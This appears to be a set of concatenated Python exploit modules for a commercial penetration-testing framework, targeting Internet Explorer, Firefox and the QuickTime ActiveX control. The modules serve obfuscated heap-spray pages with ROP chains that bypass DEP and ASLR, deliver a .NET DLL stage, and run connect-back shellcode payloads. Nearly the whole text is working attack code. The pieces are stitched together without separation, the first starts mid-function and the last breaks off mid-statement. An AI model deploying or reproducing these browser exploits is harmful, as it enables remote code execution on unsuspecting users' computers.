unescape("SPRAYADDR"); while (small.length != 30) small += addr; for (i = 0; i < 1024*1024*2; ++i) container.push(unescape(small)); ni.referenceNode; } </script> </head> <body onload="run();"> </body> </html> """ filedata = filedata.replace('PAYLOAD', wp_urluencode(depSc)) filedata = filedata.replace('SPRAYADDR', wp_urluencode(sprayaddr)) filedata = filedata.replace('RANDPAD', wp_urluencode(wp_randomstring(4))) return filedata def makefile(self, browser, osversion): if osversion == "Windows 2003": self.log('WP> Serving Windows 2003 Exploit') return self.makefile2003() # Default to XP self.log('WP> Serving Windows XP Exploit') return self.makefileXP() def makesploit(self, clientheader, clientbody): self.createShellcode() # The main call from ClientD from libs.spkproxy import header, body h = header('SERVER') b = body() self.log("WP> URL Received: %s" % clientheader.URL) user_agent = clientheader.getStrValue(['User-Agent']) # Get details browser, osversion = wp_browserinfo(user_agent) self.log('WP> OSVersion: %s' % osversion) self.log('WP> Browser: %s' % browser) self.log('WP> ') self.log('WP> User agent of connecting host: %s' % user_agent) if not 'Firefox/9' in browser: if not 'Firefox/8' in browser: self.log('WP> Target browser invalid') return 0 if clientheader.URL.count(self.filename): self.log('WP> Serving exploit file') data = self.makefile(browser, osversion) if not data: return None, None b.setBody(data) h.addHeader('Content-Type', 'text/html') h.addHeader('Set-Cookie', 'SessionID=%d' % self.jsObfuscator.getXORKey()) else: self.log('WP> Redirecting to self') h.status = '302' h.addHeader('Location', self.filename) h.addHeader('Content-Type', 'text/html') return h, b def run(self): filedata = self.makefile() outputfile = wp_outputpath(self.filename) self.log("WP> Opening %s for output" % outputfile) fd = file(outputfile, 'wb+') fd.write(filedata) fd.close() self.log('WP> Wrote to %s' % (outputfile)) return 1
class theexploit(wp_exploit, httpclientside): ###################################################################################### ## WP> Dialog Information ##########################s############################################################ PAYLOADS = [ "IE Inject Connect Back", "HTTPMOSDEF SSL", "HTTPMOSDEF PLAIN", "Execute Command" ] # Clienside exploits default to HTTPMosdef PLAIN for clientD DEFAULT_PAYLOAD = 2 def __init__(self): wp_exploit.__init__(self) httpclientside.__init__(self) self.setInfo(DESCRIPTION) self.setInfo(VERSION) self.name = NAME self.targets = targets self.version = 0 self.use_universal = True # We default these to false self.HTTPMOSDEF = False self.useSSLMOSDEF = False self.isClientD = False self.badstring = '' # Shellcode is on heap or in dll #Ranomisze name for clientd self.filename = "".join( [random.choice(string.uppercase) for x in range(8)]) + ".html" # HTTP Custom Stuff self.jsObfuscator = JSObfuscator() self.jsObfuscator.xorKeyFromCookie("SessionID") # For IE7 .Net Shellcode self.vProtect = True self.pc = 0x44444444 def is_vulnerable(self, info_dict): # Called from ClientD, if recon modules are enabled # returns a value used to rank the exploit within attacking modules """ Check for IE """ self.isClientD = True if "MSIE" in info_dict['user_agent']: self.log("WP> Target has MSIE") language = info_dict['plugins'].get("language", "") if type(language) == type([]): language = language[0] # it's a list in actuality self.log("WP> language found: %s" % language) if "en-us" in language: return 95 else: return 20 return 0 def usage(self): self.wp_usage(targets, "-F <filename>") return def neededListenerTypes(self): self.getArgs() return self.wp_createWin32Listener() def createShellcode(self): self.getArgs() #self.log('WP> Targeting version %d: %s'%(self.version,targets[self.version][0])) return self.wp_createShellcode() def getArgs(self): # If Called from clientD, update shellcode accordingly if getattr(self, 'useSSLMOSDEF', False): self.isClientD = True self.DEFAULT_PAYLOAD = 1 else: # Potentially called from httpserver update shellcode accordingly if self.HTTPMOSDEF: if self.useSSLMOSDEF: self.DEFAULT_PAYLOAD = 1 else: self.DEFAULT_PAYLOAD = 2 # Selected shell options self.wp_getShellcodeType() # If called from clientD there will be no target here if self.target: self.host = self.target.interface self.filename = self.argsDict.get('filename', self.filename) return def displayVersions(self): for t in targets.keys(): print 'WP> Version %d: %s' % (t, targets[t][0]) return def heapSpray(self, payload, heapspraycode): # This creates a heapspray of blocks that are 0x240000 (0x23f000 on Win7) in size # almost gauruntees that our spray block sits at 0xxxxx1000 or other 100 byte boundary heapprefix = wp_randomstring(220) # padding to 0x100 bytes script = """ memory = new Array(); var hs = unescape("HEAPSPRAYCODE"); while(hs.length < 0x11F600) hs += hs; hs = hs.substring(0, 0x11F600-DATALENGTH); hs = unescape("PREFIX") + hs + unescape("PAYLOAD"); try{ for(var i = 0; i < 400; i++) { memory[i]= hs.substring(0,hs.length); } } catch(err) {} """ script = script.replace('DATALENGTH', str((0x100 + len(payload)) / 2)) script = script.replace('HEAPSPRAYCODE', wp_urluencode(heapspraycode)) script = script.replace('PREFIX', wp_urluencode(heapprefix)) script = script.replace('PAYLOAD', wp_urluencode(payload)) #Obfuscate the script code if self.isClientD: self.log("WP> Running jsObfuscator") return self.jsObfuscator.obfuscate(script) else: return script def makeTriggerIE8(self): filedata = """ mem = new Array(); var ptr = unescape("%u1414%u1414"); while(ptr.length < #SIZE#) { ptr += ptr; } ptr = ptr.slice(0, (#SIZE#)/2); for(var i = 0; i < 0x3000; i++) { mem[i]= ptr.substring(0,ptr.length);} for(var xi = 0; xi < 5; xi++) {document.body.innerHTML += "<object align='right' hspace='1000' width='1000'>AAAAA</object>";} for(var i = 0; i < 0x3000; i++) {mem[i+0x3000]= ptr.substring(0,ptr.length); } document.body.innerHTML += "<a id='AAAAA' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >AAAAA</a>"; document.body.innerHTML += "Please wait for the page to load."; document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>111_AA</strong>"; </SCRIPT> </body> </html> """ filedata = filedata.replace("#SIZE#", "0xDA") return filedata def makefileIE8_VistaWin7(self, stage): # Exploit for IE 8 Windows 7/Vista # This page loads java and uses sayonara if stage == 1: # Load Java filedata = """ <object alt="Verify JRE Applet 2" classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="1" height="1"> <param name="type" value="application/x-java-applet" /> <param name="codebase" value="/jsp_utils/" /> <param name="code" value="jreVerify.class" /> <param name="jumpto" value="/en/download/installed.jsp?" /> <param name="pause" value="5000" /> </object> <script>document.location="/PAGE2"</script> """ filedata = filedata.replace( 'PAGE2', self.filename.replace('.html', '.2.html')) return filedata elif stage == 2: landingAddress = 0x14141414 heapspraycode = pack('<L', 0x7C341AF9) # RETN heapspraycode += pack('<L', 0x7C341AF9) * 5 # RETN heapspraycode += pack('<L', 0x7C341AF9) # RETN heapspraycode += pack('<L', 0x7C341A14) * 26 # RETN 4 heapspraycode += pack('<L', 0x7C34E7BA) # Stack/Heap Flip while len(heapspraycode) < ( 0x100): # Build out to 0x100 byte blocks heapspraycode += pack('<L', 0x7C341AF9) # RETN # depbypass using sayonara depbypass = self.wp_sayonaraASLRDEPBypass( (len(self.shellcode) + 104)) # Set the payload payload = depbypass + wp_randomnops(4) + self.shellcode + ("\x00" * 100) #pad the payload out to 0x100 bytes payload += wp_randomstring(256 - (len(payload) % 256)) filedata = """ <html> <body> <script language="JavaScript"> """ # script main heapspray code filedata += self.heapSpray(payload, heapspraycode) # Add the reset of the exploit trigger filedata += self.makeTriggerIE8() return filedata def makeTriggerIE7(self, amount="0x3000"): filedata = """ mem = new Array(); var ptr = unescape("%u1414%u1414"); while(ptr.length < #SIZE2#) { ptr += ptr; } ptr2 = ptr.slice(0, (#SIZE2#/2)); ptr = ptr.slice(0, (#SIZE#/2)); for(var i = 0; i < #AMOUNT#; i++) {mem[i]= ptr.substring(0,ptr.length); } for(var xi = 0; xi < 5; xi++) {document.body.innerHTML += "<object align='right' hspace='1000' width='1000'>AAAAA</object>";} for(var i = 0; i < 0x5000; i++) {mem[i+0x1000]= ptr2.substring(0,ptr2.length); } document.body.innerHTML += "<a id='AAAAA' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >AAAAA</a>"; document.body.innerHTML += "Please wait for the page to load."; document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>111_AA</strong>"; </SCRIPT> </body> </html> """ filedata = filedata.replace("#SIZE#", "0xa8") filedata = filedata.replace("#SIZE2#", "0x112") filedata = filedata.replace("#AMOUNT#", amount) return filedata def makefileIE7(self, stage): # Exploit for Windows Vista IE 7 # .Net DLL ASLR/DEP Bypass if stage == 1: filedata = """ <html> <object classid="OURDLL#a.b" height="1" width="1"></object> <script>document.location="/PAGE2"</script> </html> """ #" filedata = filedata.replace('OURDLL', self.filename.replace('.html', '.dll')) filedata = filedata.replace( 'PAGE2', self.filename.replace('.html', '.2.html')) return filedata elif stage == 2: landingAddress = 0x14141414 heapspraycode = pack('<L', landingAddress) # ptr heapspraycode += pack('<L', landingAddress) # ptr heapspraycode += pack('<L', self.pc) # Return to .Net DLL code heapspraycode += pack('<L', self.pc) # Return to .Net DLL code heapspraycode += pack('<L', self.pc) # Return to .Net DLL code heapspraycode += pack('<L', self.pc) # Return to .Net DLL code heapspraycode += pack('<L', self.pc) # Return to .Net DLL code while len(heapspraycode) < ( 0x100): # Build out to 0x100 byte blocks heapspraycode += pack('<L', self.pc) # JUNK # Set the payload, payload is inside the loaded dll file payload = "" filedata = """ <html> <title>Loading</title> <body> <script language="JavaScript"> """ # script main heapspray code filedata += self.heapSpray(payload, heapspraycode) # Add the reset of the exploit trigger filedata += self.makeTriggerIE7() return filedata def makefileWinXP(self, browser): # Exploit for Windows XP (DEP Bypass) landingAddress = 0x14141414 if browser == "MSIE 8.0": heapspraycode = pack('<L', 0x77C21A57) # RETN heapspraycode += pack('<L', 0x77C21A57) * 5 # RETN heapspraycode += pack('<L', 0x77C21A57) # RETN heapspraycode += pack('<L', 0x77C214DF) * 26 # RETN 4 heapspraycode += pack('<L', 0x77C15ED5) # Stack/Heap Flip (EAX->ESP) while len(heapspraycode) < ( 0x100): # Build out to 0x100 byte blocks heapspraycode += pack('<L', 0x77C21A57) # RETN else: heapspraycode = pack('<L', 0x77C214DF) # RETN 4 heapspraycode += pack('<L', 0x77C21A57) # RETN heapspraycode += pack('<L', 0x77C15ED5) # Stack/Heap Flip (EAX->ESP) while len(heapspraycode) < ( 0x100): # Build out to 0x100 byte blocks heapspraycode += pack('<L', 0x77C21A57) # RETN # dep bypass depbypass = self.wp_UniversalDEPBypassWinXP_VP(len(self.shellcode) + 8) # Set the payload payload = depbypass + wp_randomnops(4) + self.shellcode + ("\x00" * 100) #pad the payload out to 0x100 bytes payload += wp_randomstring(256 - (len(payload) % 256)) filedata = """ <html> <body> <script language="JavaScript"> """ # script main heapspray code filedata += self.heapSpray(payload, heapspraycode) # Add the reset of the exploit trigger if browser == "MSIE 8.0": filedata += self.makeTriggerIE8() else: filedata += self.makeTriggerIE7("2500") return filedata def makefile(self, browser, osversion): if osversion == "Windows XP": self.log('WP> Serving Windows XP exploit') return self.makefileWinXP(browser) if browser == "MSIE 9.0": #self.log('WP> Serving MSIE 9.0 exploit') #return self.makefileIE8_VistaWin7(1) return "" if browser == "MSIE 8.0": self.log('WP> Serving MSIE 8.0 exploit') return self.makefileIE8_VistaWin7(1) if browser == "MSIE 7.0": self.log('WP> Serving MSIE 7.0 exploit') return self.makefileIE7(1) # Default to a non ASLR version self.log('WP> Serving Non ASLR Exploit') return self.makefileWinXP(browser) def makesploit(self, clientheader, clientbody): self.createShellcode() # The main call from ClientD from libs.spkproxy import header, body h = header('SERVER') b = body() self.log('WP> ****************************************') self.log("WP> URL Received: %s" % clientheader.URL) user_agent = clientheader.getStrValue(['User-Agent']) cookies = clientheader.getStrValue(['Cookie']) # Get details browser, osversion = wp_browserinfo(user_agent) self.log('WP> OSVersion: %s' % osversion) self.log('WP> Browser: %s' % browser) self.log('WP> ') #self.log('WP> User agent of connecting host: %s' % user_agent) #self.log('WP> Cookies of connecting host: %s' % cookies) if clientheader.URL.count(self.filename): if cookies.count("SessionID"): self.log('WP> Exploit already sent to this client') self.log('WP> Returning blank page') data = "" else: self.log('WP> Serving exploit html file') data = self.makefile(browser, osversion) b.setBody(data) h.addHeader('Content-Type', 'text/html') h.addHeader('Set-Cookie', 'SessionID=%d' % self.jsObfuscator.getXORKey()) elif (clientheader.URL.count('.dll')): p = PElib() if browser == "MSIE 7.0": self.log('WP> Serving IE7 .Net DLL file') self.vProtect = True # Needed for this type of payload data = p.createDotNETPEFileBuf(self.createShellcode(), self.pc) self.vProtect = False # Reset this else: self.log('WP> Serving IE8 .Net DLL file') data = p.createDotNETPEFileBuf("", self.pc) b.setBody(data) h.addHeader('Content-Type', 'application/octet-stream') elif (clientheader.URL.count('.2.html')): if cookies.count("SessionID2"): self.log('WP> Exploit already sent to this client') self.log('WP> Returning blank page') data = "" else: self.log('WP> Serving exploit secondary file') if browser == "MSIE 7.0": data = self.makefileIE7(2) else: data = self.makefileIE8_VistaWin7(2) b.setBody(data) h.addHeader('Content-Type', 'text/html') h.addHeader('Set-Cookie', 'SessionID2=%d' % self.jsObfuscator.getXORKey()) elif (clientheader.URL.count('iexplore.exe.config')): self.log('WP> Returning blank page') b.setBody("") h.addHeader('Content-Type', 'text/html') elif (clientheader.URL.count('jreVerify.class')): self.log('WP> Returning blank page') b.setBody("") h.addHeader('Content-Type', 'text/html') elif (clientheader.URL.count('favicon.ico')): self.log('WP> Returning blank page') b.setBody("") h.addHeader('Content-Type', 'text/html') else: self.log('WP> Redirecting to self') h.status = '302' h.addHeader('Location', self.filename) h.addHeader('Content-Type', 'text/html') self.log('WP> ****************************************') return h, b def run(self): if (self.version == 0): filedata = self.makefile('', 'Windows XP') elif (self.version == 1): filedata = self.makefile('MSIE 7', '') elif (self.version == 2): filedata = self.makefile('MSIE 8', '') self.log("WP> Opening %s" % (self.filename)) fd = file(self.filename, 'wb+') fd.write(filedata) fd.close() self.log('WP> Wrote to %s' % (self.filename)) return 1
class theexploit(httpclientside): def __init__(self): httpclientside.__init__(self) self.version = 0 self.name = NAME self.setInfo(DESCRIPTION) self.filename = "".join([choice(ascii_lowercase) for x in range(8)]) + ".html" # Set up our javascript obfuscator, this could be done in httpclientside class self.jsObfuscator = JSObfuscator() self.jsObfuscator.xorKeyFromCookie("SessionID") # we want clientd to give us a plugin dict self.plugin_info = None return def is_vulnerable(self, info_dict): """ Check to make sure this is something we want to run. This is called by cliend.py """ if "MSIE" in info_dict['user_agent']: return 50 return 0 def makefile(self, request_header=None): """ Generate the HTML to be included in the exploit file """ filedata = """ <html> <head></head> <body onload="setTimeout('exploit();', 1000)"> <object id="qt" classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"></object> <div id="exploit"></div> <script type="text/javascript"> """ script = """ function hexa(val) { var str = new Number(val).toString(16); while (str.length < 4) str = "0" + str; return str; } function myescape(addr) { var str = ""; str = "%u" + hexa(addr & 0xffff) + "%u" + hexa((addr >> 16) & 0xffff); return unescape(str); } function qt_767() { // This is the bug // eax is our pointer, we point it to our fake vtable // 7750dc93 8b08 mov ecx,dword ptr [eax] ds:0023:80000000=???????? // 7750dc95 8d5508 lea edx,[ebp+8] // 7750dc98 52 push edx // 7750dc99 ff7510 push dword ptr [ebp+10h] // 7750dc9c ff750c push dword ptr [ebp+0Ch] // 7750dc9f 50 push eax // 7750dca0 ff510c call dword ptr [ecx+0Ch] // // QuickTimeStreaming.qtx // ROP Gadget 1: // // 6785FF86 94 XCHG EAX,ESP // 6785FF87 5F POP EDI // 6785FF88 5E POP ESI // 6785FF89 C3 RETN /// // ROP Gadget 2: this dereferences the address of VirtualAlloc from the IAT // 677B0244 8B01 MOV EAX,DWORD PTR DS:[ECX] // 677B0246 C3 RETN /// // ROP Gadget 3: this calls VirtualAlloc(0, size, 0x1000, 0x40) // 677A509E FFD0 CALL EAX // 677A50A0 C3 RETN // /// ROP Gadget 4 // 678D4FD5 97 XCHG EAX,EDI // 678D4FD6 C3 RETN /// // ROP Gadget 5 // 677A9B4B 8BC7 MOV EAX,EDI // 677A9B4D 5E POP ESI // 677A9B4E C3 RETN /// // ROP Gadget 6 // 677A1E27 59 POP ECX // 677A1E28 C3 RETN /// // ROP Gadget 7 // 678178D2 F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS> // 678178D4 5F POP EDI // 678178D5 5E POP ESI // 678178D6 C3 RETN /// // ROP Gadget 8 // 677A509E FFD0 CALL EAX // 677A50A0 C3 RETN /// Break on 7750dc93 for debugging // Sprayed address we can reach to. // 20282CB8 20282CB8 self_address = 0x20282CB8; gadget_1 = 0x6785FF86; gadget_2 = 0x677B0244; gadget_3 = 0x677A509E; gadget_4 = 0x678D4FD5; gadget_5 = 0x677A9B4B; gadget_6 = 0x677A1E27; gadget_7 = 0x678178D2; gadget_8 = 0x677A509E; valloc = 0x6791009C; // VirtualAlloc IAT Entry fake_vtable = myescape(self_address); // edi = will point to this fake_vtable += myescape(0xcafecafe); // dummy fake_vtable += myescape(gadget_6); // pop crap from stack (this will skip gadget_1) fake_vtable += myescape(gadget_1); // Get me ESP fake_vtable += myescape(gadget_6); // ecx = VirtualAlloc@IAT fake_vtable += myescape(valloc); fake_vtable += myescape(gadget_2); // eax = VirtualAlloc fake_vtable += myescape(gadget_3); // call VirtualAlloc(0, size, 0x1000, 0x40) fake_vtable += myescape(0x0); // NULL fake_vtable += myescape(0x10000); // size fake_vtable += myescape(0x3000); // MEM_COMMIT | MEM_RESERVE fake_vtable += myescape(0x40); // PAGE_EXECUTE_READWRITE fake_vtable += myescape(gadget_4); // edi = eax (valloced memory) fake_vtable += myescape(gadget_5); // eax = edi (save it) fake_vtable += myescape(self_address+84); // shellcode address fake_vtable += myescape(gadget_6); // ecx = sizeof(shellcode) fake_vtable += myescape(0x1000); // sizeof(shellcode) fake_vtable += myescape(gadget_7); // memcpy fake_vtable += myescape(0xbadc0ded); // dummy fake_vtable += myescape(0xbadc0ded); // dummy fake_vtable += myescape(gadget_8); // Call shellcode fake_vtable += unescape("SHELLCODE"); // @84 var crapuccino = myescape(0xbadc0ded); while(fake_vtable.length < 0x7fff00) fake_vtable += fake_vtable; h1 = []; h1[0] = fake_vtable + crapuccino; var i; for (i = 1 ; i < 20 ; i++) h1[i] = h1[0].substring(0, h1[0].length) var object = '<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" height="0">' + '<PARAM name="_Marshaled_pUnk" value="' + self_address + '"/>' + '</object>'; document.getElementById("exploit").innerHTML = object; } function qt_765() { // This is the bug // eax is our pointer, we point it to our fake vtable // 7750dc93 8b08 mov ecx,dword ptr [eax] ds:0023:80000000=???????? // 7750dc95 8d5508 lea edx,[ebp+8] // 7750dc98 52 push edx // 7750dc99 ff7510 push dword ptr [ebp+10h] // 7750dc9c ff750c push dword ptr [ebp+0Ch] // 7750dc9f 50 push eax // 7750dca0 ff510c call dword ptr [ecx+0Ch] // // QuickTimeStreaming.qtx // ROP Gadget 1: // // 673BEED5 94 XCHG EAX,ESP // 673BEED6 5B POP EBX // 673BEED7 59 POP ECX // 673BEED8 C3 RETN // /// ROP Gadget 2: // // 673BC20E 5B POP EBX // 673BC20F C3 RETN /// // ROP Gadget 3: this dereferences the address of VirtualAlloc from the IAT // // 673B1F38 8B01 MOV EAX,DWORD PTR DS:[ECX] // 673B1F3A C3 RETN /// // ROP Gadget 4: this calls VirtualAlloc(0, size, 0x1000, 0x40) // 6744568A FFD0 CALL EAX // 6744568C C3 RETN // /// ROP Gadget 5 // 6743E26B 97 XCHG EAX,EDI // 6743E26C 0100 ADD DWORD PTR DS:[EAX],EAX // 6743E26E 8948 0C MOV DWORD PTR DS:[EAX+C],ECX // 6743E271 C3 RETN /// // ROP Gadget 6 // 67448AFA 8BC7 MOV EAX,EDI // 67448AFC 5E POP ESI // 67448AFD C3 RETN /// // ROP Gadget 7 // 673B1122 59 POP ECX // 673B1123 C3 RETN /// // ROP Gadget 8 // 6743CD4F F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] // 6743CD51 5F POP EDI // 6743CD52 5E POP ESI // 6743CD53 C3 RETN /// // ROP Gadget 9 // 673C79A5 FFE0 JMP EAX // /// Break on 7750dc93 for debugging // Sprayed address we can reach to. self_address = 0x10022C98; gadget_1 = 0x673BEED5; gadget_2 = 0x673BC20E gadget_3 = 0x673B1F38; gadget_4 = 0x6744568A; gadget_5 = 0x6743E26B; gadget_6 = 0x67448AFA; gadget_7 = 0x673B1122; gadget_8 = 0x6743CD4F; gadget_9 = 0x673C79A5; valloc = 0x674601AC; // VirtualAlloc IAT Entry fake_vtable = myescape(0xcafecafe); fake_vtable += myescape(self_address); // ecx@1 will point to this fake_vtable += myescape(valloc); // ecx@2 will have VirtualAlloc@IAT fake_vtable += myescape(gadget_2); // pop crap fake_vtable += myescape(gadget_1); // Get me ESP fake_vtable += myescape(gadget_3); // EAX = [IAT:VirtualAlloc] fake_vtable += myescape(gadget_4); // call VirtualAlloc fake_vtable += myescape(0x0); // NULL fake_vtable += myescape(0x10000); // size fake_vtable += myescape(0x3000); // MEM_COMMIT | MEM_RESERVE fake_vtable += myescape(0x40); // PAGE_EXECUTE_READWRITE fake_vtable += myescape(gadget_5); // set edi = eax fake_vtable += myescape(gadget_6); // set eax = edi ; set esi = shellcode fake_vtable += myescape(self_address+76); // shellcode address fake_vtable += myescape(gadget_7); // ecx = sizeof(shellcode) fake_vtable += myescape(0x1000); // sizeof(shellcode) fake_vtable += myescape(gadget_8); // memcpy fake_vtable += myescape(0xbadc0ded); // dummy fake_vtable += myescape(0xbadc0ded); // dummy fake_vtable += myescape(gadget_9); // jmp to shellcode fake_vtable += unescape("SHELLCODE"); // @76 var crapuccino = myescape(0xbadc0ded); while(fake_vtable.length < 0x7fff00) fake_vtable += fake_vtable; h1 = []; h1[0] = fake_vtable + crapuccino; var i; for (i = 1 ; i < 20 ; i++) h1[i] = h1[0].substring(0, h1[0].length) var object = '<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" height="0">' + '<PARAM name="_Marshaled_pUnk" value="' + self_address + '"/>' + '</object>'; document.getElementById("exploit").innerHTML = object; } function exploit() { /// NOTE to the reader, I KNOW I've copied some parts of the exploit /// that might be shared by all the versions of the exploit but this /// way is easier to debug and extend. var version = qt.GetQuickTimeVersion(); /// Versions 7.6.7 and 7.6.6 shoudl work with the same ROP if(version == "7.6.7") qt_767(); else if(version == "7.6.6") qt_767(); else if(version == "7.6.5") qt_765(); } """ script = script.replace('SHELLCODE', urluencode(self.shellcode)) #filedata += self.jsObfuscator.obfuscate(script) filedata += script filedata += """ </script> </body> </html> """ return filedata def makesploit(self, clientheader, clientbody): """ Called automatically """ from libs.spkproxy import header, body # header is used to store request and reponse headers header = header('SERVER') body = body() if clientheader.URL.count(self.filename): self.log('Serving HTML file') # Create the shellcode (self.shellcode) self.createShellcode() # Create the HTML Contents html = self.makefile(request_header=clientheader) body.setBody(html) header.addHeader('Content-Type', 'text/html') header.addHeader('Set-Cookie', 'SessionID=%d' % self.jsObfuscator.getXORKey()) else: self.log('Redirecting to self') header.status = '302' header.addHeader('Location', self.filename) header.addHeader('Content-Type', 'text/html') return header, body def neededListenerTypes(self): return self.clientSideListenerTypes() def getArgs(self): """ Get the required parameters from the program that ran the exploit (i.e. CANVAS GTK GUI or Command line) """ self.host = self.target.interface self.getarg("filename") self.getarg("language") return def displayVersions(self): """ XXX Called from the cmd line or canvas to show the available versions? """ for t in targets.keys(): print 'Version %d: %s' % (t, targets[t][0]) return def run(self): """ Run is the firth method that is automatically executed by CANVAS """ # Populate the needed arguments of the exploit self.getArgs() # Build the html that triggers the vulnerability filedata = self.makefile() self.log('Opening %s for output' % (self.filename)) fd = file(self.filename, 'wb+') fd.write(filedata) fd.close() self.debuglog('Wrote to %s' % (self.filename), color="red") return 1
class theexploit(wp_exploit, httpclientside): ###################################################################################### ## WP> Dialog Information ##########################s############################################################ PAYLOADS = [ "IE Inject Connect Back", "HTTPMOSDEF SSL", "HTTPMOSDEF PLAIN", "Execute Command" ] # Clienside exploits default to HTTPMosdef PLAIN for clientD DEFAULT_PAYLOAD = 2 def __init__(self): wp_exploit.__init__(self) httpclientside.__init__(self) self.setInfo(DESCRIPTION) self.setInfo(VERSION) self.name = NAME self.targets = targets self.version = 0 self.use_universal = True # We default these to false self.HTTPMOSDEF = False self.useSSLMOSDEF = False self.isClientD = False self.badstring = '' # Shellcode is on heap or in dll #Ranomisze name for clientd self.filename = "".join( [random.choice(string.uppercase) for x in range(8)]) + ".html" # HTTP Custom Stuff self.jsObfuscator = JSObfuscator() self.jsObfuscator.xorKeyFromCookie("SessionID") # For IE7 .Net Shellcode self.vProtect = True self.pc = 0x44444444 return def is_vulnerable(self, info_dict): # Called from ClientD, if recon modules are enabled # returns a value used to rank the exploit within attacking modules """ Check for IE """ self.isClientD = True if "MSIE" in info_dict['user_agent']: self.log("WP> Target has MSIE") language = info_dict['plugins'].get("language", "") if type(language) == type([]): language = language[0] # it's a list in actuality self.log("WP> language found: %s" % language) if "en-us" in language: return 95 else: return 20 return 0 def usage(self): self.wp_usage(targets, "-F <filename>") return def neededListenerTypes(self): self.getArgs() return self.wp_createWin32Listener() def createShellcode(self): self.getArgs() #self.log('WP> Targeting version %d: %s'%(self.version,targets[self.version][0])) return self.wp_createShellcode() def getArgs(self): # If Called from clientD, update shellcode accordingly if getattr(self, 'useSSLMOSDEF', False): self.isClientD = True self.DEFAULT_PAYLOAD = 1 else: # Potentially called from httpserver update shellcode accordingly if self.HTTPMOSDEF: if self.useSSLMOSDEF: self.DEFAULT_PAYLOAD = 1 else: self.DEFAULT_PAYLOAD = 2 # Selected shell options self.wp_getShellcodeType() # If called from clientD there will be no target here if self.target: self.host = self.target.interface self.filename = self.argsDict.get('filename', self.filename) return def displayVersions(self): for t in targets.keys(): print 'WP> Version %d: %s' % (t, targets[t][0]) return def makefileIE8_VistaWin7_part1(self): # Exploit for IE 8 Windows 7/Vista # This page loads a .Net DLL # mscorie .Net DLL ASLR/DEP Bypass filedata = """ <html> <object classid="OURDLL" height="0" width="0"></object> <iframe src=/page2.htm></iframe> </html> """ filedata = filedata.replace('OURDLL', self.filename.replace('.html', '.dll')) return filedata def makefileIE8_VistaWin7_part2(self): # Exploit for IE 8 Windows 7/Vista landingAddress = 0x126A1000 #0x126A1000 heapspraycode = pack('<L', 0x63F05761) #the slide of RETN heapspraycode += pack('<L', landingAddress + 8) # MOV EAX,DWORD PTR DS:[ECX] heapspraycode += pack('<L', 0x63F0575B) # MSCORIE:(0x63f0575b XCHG EAX,ESP) heapspraycode += pack('<L', landingAddress) # JUNKED heapspraycode += pack('<L', 0x63F03E9B) # RETN 30 heapspraycode += pack('<L', 0x63F057D3) # RETN 0C heapspraycode += pack('<L', 0x00000001) # required byte heapspraycode += pack('<L', 0x63F03E9B) # RETN 30 heapspraycode += pack('<L', landingAddress) heapspraycode += pack('<L', landingAddress + 4) # MOV ECX,DWORD PTR DS:[ECX+20] heapspraycode += pack( '<L', 0x63F0237E ) # MOV EDX,DWORD PTR DS:[EAX+20] 63F0237E MSCOREIE: CALL DWORD PTR DS:[ECX+4] heapspraycode += pack('<L', 0x63F03E9B) * 10 # RETN 30 heapspraycode += pack('<L', 0x00000001) # required byte while len(heapspraycode) < (0x100 - 4): heapspraycode += pack('<L', 0x63F05761) # RETN heapspraycode += pack('<L', 0x63F03E9B) # RETN 30 depbypass = pack('<L', 0x63F05761) # RETN depbypass += pack('<L', 0x11111111) * 0x0C # Slackspace # depbypass using mscorie # Clever trick using PUSHAD to get the current ESP location into the params # depbypass += pack('<L', 0x63f05428) # POP EDI, ESI, RET depbypass += pack('<L', 0x63f05b01) # RETN depbypass += pack('<L', 0x63f05b01) # RETN depbypass += pack('<L', 0x63f05557) # POP EBP depbypass += pack('<L', 0x63f04cb5) # Call VirtualAlloc depbypass += pack('<L', 0x63f054c0) # POP EBX depbypass += pack('<L', 0x000007d0) # Size depbypass += pack('<L', 0x63f05458) # POP EDX depbypass += pack('<L', 0x00001000) # Type depbypass += pack('<L', 0x63f01e13) # POP ECX depbypass += pack('<L', 0x00000040) # Protect depbypass += pack('<L', 0x63f05afa) # PUSHAD, XOR EAX,C9027563, RET depbypass += pack('<L', 0x63f069e3) # CALL ESP depbypass += pack('<L', 0x11111111) # slackspace depbypass += pack('<L', 0x11111111) # slackspace depbypass += pack('<L', 0x11111111) # slackspace depbypass += pack('<L', 0x11111111) # slackspace depbypass += pack('<L', 0x11111111) # slackspace filedata = """ <html> <script language="JavaScript"> """ #script code script = """ memory = new Array(); shellcode = unescape("SHELLCODE"); //var len= shellcode.length + 0x21; //0x21 is heap header var len=0 var heapspray = unescape("HEAPSPRAYCODE"); while(heapspray.length < 0x120000) heapspray += heapspray; heapspray = heapspray.substring(0, 0x120000- len); prefix = unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); heapspray = prefix + 